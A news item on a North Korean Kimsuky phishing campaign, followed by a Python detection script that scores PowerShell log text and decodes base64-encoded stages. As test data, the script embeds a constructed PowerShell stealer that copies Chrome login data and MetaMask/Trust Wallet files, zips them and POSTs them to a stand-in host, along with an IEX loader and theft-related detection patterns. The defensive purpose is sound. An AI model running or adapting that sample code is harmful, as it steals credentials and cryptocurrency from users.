A newly uncovered phishing campaign linked to North Korean APT group Kimsuky shows a marked evolution in its technical sophistication, particularly in targeting cryptocurrency holders and government-affiliated individuals, according to Cyber Security News.
According to K7 Security Labs, Kimsuky has deployed multi-layered malware delivered through heavily obfuscated VBScript and PowerShell components designed to bypass standard detection tools. The malware executes in stages, beginning with dynamic script generation to evade signature-based defenses, then proceeds to extract system data, browser credentials, and a wide array of cryptocurrency wallet information, including MetaMask and Trust Wallet data. Notably, the malware includes anti-analysis checks that detect virtual machines, and it packs stolen data into ZIP archives to disguise it before exfiltration. It communicates with a command-and-control server that can issue further commands, giving the operators persistent access. Kimsuky has clearly invested in refining its data theft and evasion techniques, researchers reported, emphasizing the group's expanded targeting scope. Security experts warn that advanced phishing education and endpoint detection are critical defenses against such sophisticated campaigns.
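The staged behaviour described above (an encoded or dynamically generated first stage, VM checks, browser and wallet credential collection, ZIP staging, HTTP exfiltration) is what endpoint detection has to key on. The script below is an added example written for this page, not code from K7 Security Labs or from the report: it triages PowerShell ScriptBlock log text with generic heuristics and unwraps base64/UTF-16LE encoded stages so that the hidden second stage is scored as well. The sample scripts, the `.invalid` hostname, the rule weights and the alert threshold are all constructed assumptions, not indicators taken from the campaign.

```python
"""Heuristic triage of PowerShell ScriptBlock log text for staged loaders.
Added example with constructed samples; the regexes are generic heuristics
written for this page, not indicators from the Kimsuky report."""
import base64
import math
import re

# (rule name, weight, pattern). Weights are an assumption: a single
# innocuous hit (e.g. a lone Compress-Archive) stays below ALERT_THRESHOLD.
RULES = [
    ("encoded_command", 3, r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{40,}|FromBase64String"),
    ("dynamic_exec",    3, r"\bIEX\b|Invoke-Expression|\[ScriptBlock\]::Create"),
    ("anti_vm",         2, r"Win32_ComputerSystem[\s\S]{0,200}?(?:VMware|VirtualBox|QEMU|Hyper-V)"),
    ("browser_creds",   2, r"Login Data|Local State|logins\.json"),
    ("wallet_access",   3, r"MetaMask|Trust ?Wallet"),
    ("zip_staging",     1, r"Compress-Archive|CreateFromDirectory"),
    ("http_exfil",      2, r"Invoke-(?:WebRequest|RestMethod)[^\n]*-Method\s+Post|\.UploadFile\("),
]
COMPILED = [(name, weight, re.compile(pat, re.I)) for name, weight, pat in RULES]
# Base64 payload either behind -EncodedCommand or inside FromBase64String('...').
ENCODED_RE = re.compile(
    r"(?:-e(?:nc(?:odedcommand)?)?\s+|FromBase64String\(\s*['\"])([A-Za-z0-9+/=]{40,})", re.I)
ALERT_THRESHOLD = 5  # assumption


def shannon_entropy(s: str) -> float:
    """Bits per character; long tokens above ~4.5 are usually base64 or packed data."""
    if not s:
        return 0.0
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())


def decode_stage(text: str):
    """Return the next stage hidden in a base64 blob (UTF-16LE, the encoding
    powershell.exe -EncodedCommand expects), or None if there is none."""
    m = ENCODED_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
    except (ValueError, UnicodeDecodeError):
        return None


def score_scriptblock(text: str, max_depth: int = 3) -> dict:
    """Score a script block and every encoded stage it unwraps to."""
    hits, score, stages = [], 0, 0
    current = text
    while current is not None and stages < max_depth:
        stages += 1
        for name, weight, rx in COMPILED:
            if name not in hits and rx.search(current):
                hits.append(name)
                score += weight
        longest = max(current.split(), key=len, default="")
        if len(longest) >= 40 and shannon_entropy(longest) > 4.5 and "high_entropy" not in hits:
            hits.append("high_entropy")
            score += 2
        current = decode_stage(current)
    return {"score": score, "hits": hits, "stages": stages, "alert": score >= ALERT_THRESHOLD}


def triage(events):
    """events: iterable of (record_id, script_text); returns the alerting ones."""
    return [(rid, score_scriptblock(body)) for rid, body in events
            if score_scriptblock(body)["alert"]]


# Constructed stage-2 sample mirroring the described behaviour: VM check,
# browser credential file, wallet extension data (name match is a stand-in;
# real extension data sits under extension IDs), ZIP staging, HTTP POST.
STAGE2 = r"""
$m = (Get-WmiObject Win32_ComputerSystem).Model
if ($m -match 'VMware|VirtualBox|QEMU') { exit }
Copy-Item "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data" $env:TEMP\c
Get-ChildItem "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Local Extension Settings" -Recurse |
  Where-Object { $_.Name -match 'MetaMask|Trust Wallet' } | Copy-Item -Destination $env:TEMP\c
Compress-Archive -Path $env:TEMP\c -DestinationPath $env:TEMP\out.zip
Invoke-WebRequest -Uri http://c2.invalid/up -Method Post -InFile $env:TEMP\out.zip
"""
# Constructed stage-1 loader: decodes stage 2 at runtime and runs it with IEX.
STAGE1 = ("$s=[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('"
          + base64.b64encode(STAGE2.encode("utf-16-le")).decode() + "'));IEX $s")
# Constructed benign admin one-liner for comparison.
BENIGN = r"Get-ChildItem C:\Logs -Filter *.log | Where-Object Length -gt 1MB | Remove-Item -Force"

if __name__ == "__main__":
    for rid, result in triage([("4104-a", STAGE1), ("4104-b", BENIGN)]):
        print(rid, result)
```

The point of unwrapping is visible in the result: on the first stage alone only the encoding and `IEX` rules fire, while the decoded second stage adds the VM check, credential, wallet, ZIP and POST hits, which is where the campaign-specific behaviour lives. In production the same scoring would run over Sysmon or Microsoft-Windows-PowerShell/Operational event 4104 bodies rather than constructed strings, and the weights would be tuned against the environment's normal administrative scripts.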